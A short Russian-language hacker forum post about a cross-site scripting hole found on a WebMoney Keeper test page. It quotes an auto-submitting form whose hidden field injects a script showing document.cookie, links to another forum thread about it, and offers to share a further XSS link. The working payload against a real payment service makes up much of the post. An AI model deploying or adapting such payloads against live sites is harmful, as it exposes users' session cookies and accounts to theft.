нашел случайно - в страничках кипера увидел закоментенный блок с линком на тестовую страницу:

<form action="http://keeper.webmoney.ru/docs/test.asp" METHOD="post">
<input type=hidden name='XSS' value='<script>alert(document.cookie + "\nXSS by KPbIC(myiworm@mail.ru)")</script>'>
</form>
<script>document.forms[0].submit();</script>

линк на страничку покаж

http://forum.zloy.org/showthread.php?t=24296

тут афтар отписался об XSS

хссы на пост - тру, единственное, от них толку нет)
Кста, me тожел нашел хсс в посте, кому линк надо?)